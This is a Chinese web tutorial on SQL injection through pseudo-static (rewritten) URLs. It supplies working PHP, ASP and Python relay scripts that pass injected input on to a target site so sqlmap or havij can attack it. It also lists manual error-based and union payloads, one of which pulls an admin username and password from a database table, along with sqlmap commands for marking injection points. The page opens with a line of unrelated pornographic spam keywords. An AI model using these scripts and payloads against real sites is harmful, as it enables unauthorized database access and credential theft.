欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

PHP針對偽靜態(tài)的注入總結(jié)【附asp與Python相關(guān)代碼】

 更新時間:2017年08月01日 09:01:07   作者:無法自拔  
這篇文章主要介紹了PHP針對偽靜態(tài)的注入,結(jié)合實例形式總結(jié)分析了php針對偽靜態(tài)的常見注入情況,并附帶asp與Python的相關(guān)操作代碼,對于php程序安全有一定借鑒價值,需要的朋友可以參考下

本文實例講述了PHP針對偽靜態(tài)的注入。分享給大家供大家參考,具體如下:

一:中轉(zhuǎn)注入法

1.通過http://www.xxx.com/news.php?id=1做了偽靜態(tài)之后就成這樣了
http://www.xxx.com/news.php/id/1.html

2.測試步驟:

中轉(zhuǎn)注入的php代碼:inject.php

<?php
set_time_limit(0);
$id=$_GET["id"];
$id=str_replace(” “,”%20″,$id);
$id=str_replace(“=”,”%3D”,$id);
//$url = "http://www.xxx.com/news.php/id/$id.html";
$url = "http://www.xxx.com/news.php/id/$id.html";
//echo $url;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>

3.本地環(huán)境搭建PHP,然后訪問http://127.0.0.1/inject.php?id=1

通過sqlmap或者h(yuǎn)avj可以跑注入漏洞。

附錄ASP中轉(zhuǎn)代碼:

<%
JmdcwName=request("id")
JmStr=JmdcwName
JmStr=URLEncoding(JmStr)
JMUrl="http://192.168.235.7:8808/ad/blog/"&nbsp;&nbsp;//實際上要請求的網(wǎng)址
JMUrl=JMUrl & JmStr&".html"&nbsp; &nbsp; //拼接url
response.write JMUrl&JmStr&nbsp; &nbsp; //我這里故意輸出url來看
'JmRef="http://127.0.0.1/6kbbs/bank.asp"
JmCok=""
JmCok=replace(JmCok,chr(32),"%20") 
JmStr=URLEncoding(JmStr)&nbsp;&nbsp;
response.write&nbsp;&nbsp;PostData(JMUrl,JmStr,JmCok,JmRef) //url,查詢字符串,cookie,referer字段
Function PostData(PostUrl,PostStr,PostCok,PostRef)&nbsp;&nbsp;
Dim Http
Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
With Http
.Open "GET",PostUrl,False
.Send ()
PostData = .ResponseBody
End With
Set Http = Nothing
PostData =bytes2BSTR(PostData)
End Function
Function bytes2BSTR(vIn)&nbsp; &nbsp;//處理返回的信息
Dim strReturn
Dim I, ThisCharCode, NextCharCode
strReturn = ""
For I = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn, I, 1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn, I + 1, 1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
I = I + 1
End If
Next
bytes2BSTR = strReturn
End Function
Function URLEncoding(vstrin)&nbsp; &nbsp; //發(fā)包前對參數(shù)的url編碼一下
strReturn=""
Dim i
'vstrin=replace(vstrin,"%","%25") '增加轉(zhuǎn)換搜索字符,
'vstrin=Replace(vstrin,chr(32),"%20") '轉(zhuǎn)換空格,如果網(wǎng)站過濾了空格,嘗試用/**/來代替%20
'vstrin=Replace(vstrin,chr(43),"%2B")&nbsp;&nbsp;'JMDCW增加轉(zhuǎn)換+字符
vstrin=Replace(vstrin,chr(32),"/**/")&nbsp;&nbsp;'在此增加要過濾的代碼 //這里很關(guān)鍵,方便啊,把空格自動換成/**/,后面會說到的
For i=1 To Len(vstrin)
ThisChr=Mid(vstrin,i,1)
if Abs(Asc(ThisChr))< &HFF Then
strReturn=strReturn & ThisChr
Else
InnerCode=Asc(ThisChr)
If InnerCode<0 Then
InnerCode=InnerCode + &H10000
End If
Hight1=(InnerCode And &HFF00) \&HFF
Low1=InnerCode And &HFF
strReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1)
End if
Next
URLEncoding=strReturn
End Function
%>

二、手工注入法

1.http://www.xxx.com/play/Diablo.html
http://www.xxx.com/down/html/?772.html

2.測試注入:

http://www.xxx.com/down/html/?772′.html
http://www.xxx.com /play/Diablo'.html
http://www.xxx.com/play/Diablo'/**/and
/**/1='1 /*.html
http://www.xxx.com/play/Diablo'
/**/and
/**/1='2 /*.html
http://www.xxx.com/page/html/?56′/**/and/**/1=1/*.html 正常
http://www.xxx.com/page/html/?56′/**/and/**/1=2/*.html 出錯

3.看頁面是否存在差異,相同則不存在,不同存在注入。

4.聯(lián)合查詢:

http://www.xxx.com/play/diablo' and 1=2 union select 1,2… frominformation_schema.columns where 1='1.html
http://www.xxx.com/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html

手工注入法(二)

http://www.xxx.net/news/html/?410.html
http://www.xxx.net/news/html/?410'union/**/select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),0x3a,(select/**/concat(user,0x3a,password)/**/from/**/pwn_base_admin/**/limit/**/0,1),0x3a)a/**/from/**/information_schema.tables/**/group/**/by/**/a)b/**/where'1'='1.html

注:

偽靜態(tài)的注入和URL的普通GET注入不太相同

。普通url的get注入的%20,%23,+等都可以用;但是偽靜態(tài)不行,會被直接傳遞到到url中,所以用/**/這個注釋符號表示空格。

三、SQLmap方法

在sqlmap中偽靜態(tài)哪兒存在注入點(diǎn)就加*
http://www.cunlide.com/id1/1/id2/2
python   sqlmap.py -u “http://www.xxx.com/id1/1*/id2/2″
http://www.xxx.com/news/class/?103.htm
python  sqlmap.py -u  “http://www.xxx.com/news/class/?103*.html”

四、python腳本方法

代碼:

from BaseHTTPServer import *
import urllib2
class MyHTTPHandler(BaseHTTPRequestHandler):
 def do_GET(self):
  path=self.path
  path=path[path.find('id=')+3:]
  proxy_support = urllib2.ProxyHandler({"http":"http://127.0.0.1:8087"})
  opener = urllib2.build_opener(proxy_support)
  urllib2.install_opener(opener)
  url="http://www.xxx.com/magazine/imedia/gallery/dickinsons-last-dance/"
  try:
   response=urllib2.urlopen(url+path)
   html=response.read()
  except urllib2.URLError,e:
   html=e.read()
  self.wfile.write(html)
server = HTTPServer(("", 8000), MyHTTPHandler)
server.serve_forever()

更多關(guān)于PHP相關(guān)內(nèi)容感興趣的讀者可查看本站專題:《php程序設(shè)計安全教程》、《php安全過濾技巧總結(jié)》、《PHP運(yùn)算與運(yùn)算符用法總結(jié)》、《PHP網(wǎng)絡(luò)編程技巧總結(jié)》、《PHP基本語法入門教程》、《php面向?qū)ο蟪绦蛟O(shè)計入門教程》、《php字符串(string)用法總結(jié)》、《php+mysql數(shù)據(jù)庫操作入門教程》及《php常見數(shù)據(jù)庫操作技巧匯總

希望本文所述對大家PHP程序設(shè)計有所幫助。

相關(guān)文章

  • php使用curl判斷網(wǎng)頁404(不存在)的方法

    php使用curl判斷網(wǎng)頁404(不存在)的方法

    這篇文章主要介紹了php使用curl判斷網(wǎng)頁404(不存在)的方法,通過curl獲取http頭信息進(jìn)行404錯誤判斷,非常簡便易懂,需要的朋友可以參考下
    2016-06-06
  • PHP命名空間定義與用法實例分析

    PHP命名空間定義與用法實例分析

    這篇文章主要介紹了PHP命名空間定義與用法,結(jié)合實例形式分析了php命名空間的原理、定義、使用方法及相關(guān)操作注意事項,需要的朋友可以參考下
    2019-08-08
  • gearman中任務(wù)的優(yōu)先級和返回狀態(tài)實例分析

    gearman中任務(wù)的優(yōu)先級和返回狀態(tài)實例分析

    這篇文章主要介紹了gearman中任務(wù)的優(yōu)先級和返回狀態(tài),結(jié)合實例形式分析了gearman任務(wù)的優(yōu)先級以及獲取返回狀態(tài)相關(guān)操作技巧,需要的朋友可以參考下
    2020-02-02
  • PHP迭代器和生成器用法實例分析

    PHP迭代器和生成器用法實例分析

    這篇文章主要介紹了PHP迭代器和生成器用法,結(jié)合實例形式分析了PHP迭代器和生成器的相關(guān)概念、原理、應(yīng)用技巧與使用注意事項,需要的朋友可以參考下
    2019-09-09
  • PHP封裝的Twitter訪問類實例

    PHP封裝的Twitter訪問類實例

    這篇文章主要介紹了PHP封裝的Twitter訪問類,通過curl調(diào)用實現(xiàn)針對Twitter的常用訪問功能,具有一定參考借鑒價值,需要的朋友可以參考下
    2015-07-07
  • php查看網(wǎng)頁源代碼的方法

    php查看網(wǎng)頁源代碼的方法

    這篇文章主要介紹了php查看網(wǎng)頁源代碼的方法,涉及php讀取網(wǎng)頁文件的技巧,具有一定參考借鑒價值,需要的朋友可以參考下
    2015-03-03
  • PHP判斷FORM表單或URL參數(shù)來的數(shù)據(jù)是否為整數(shù)的方法

    PHP判斷FORM表單或URL參數(shù)來的數(shù)據(jù)是否為整數(shù)的方法

    這篇文章主要介紹了PHP判斷FORM表單或URL參數(shù)來的數(shù)據(jù)是否為整數(shù)的方法,需要的朋友可以參考下
    2016-03-03
  • PHP組合模式Composite Pattern優(yōu)點(diǎn)與實現(xiàn)過程

    PHP組合模式Composite Pattern優(yōu)點(diǎn)與實現(xiàn)過程

    這篇文章主要介紹了PHP組合模式Composite Pattern優(yōu)點(diǎn)與實現(xiàn),組合模式是一種結(jié)構(gòu)型模式,它允許你將對象組合成樹形結(jié)構(gòu)來表示“部分-整體”的層次關(guān)系。組合能讓客戶端以一致的方式處理個別對象和對象組合
    2023-03-03
  • PHP實現(xiàn)文字寫入圖片功能

    PHP實現(xiàn)文字寫入圖片功能

    這篇文章主要為大家詳細(xì)介紹了PHP實現(xiàn)文字寫入圖片功能,具有一定的參考價值,感興趣的小伙伴們可以參考一下
    2019-02-02
  • 淺談PHP性能優(yōu)化之php.ini配置

    淺談PHP性能優(yōu)化之php.ini配置

    用于生產(chǎn)環(huán)境中的PHP需要對其進(jìn)行優(yōu)化,讓PHP自身發(fā)揮更好的性能,除了寫好PHP代碼,還要配置好php.ini。本文從內(nèi)存、文件上傳、會話緩沖輸出、真實路徑緩存這幾個方面講解php.ini的配置調(diào)優(yōu)。
    2021-05-05

最新評論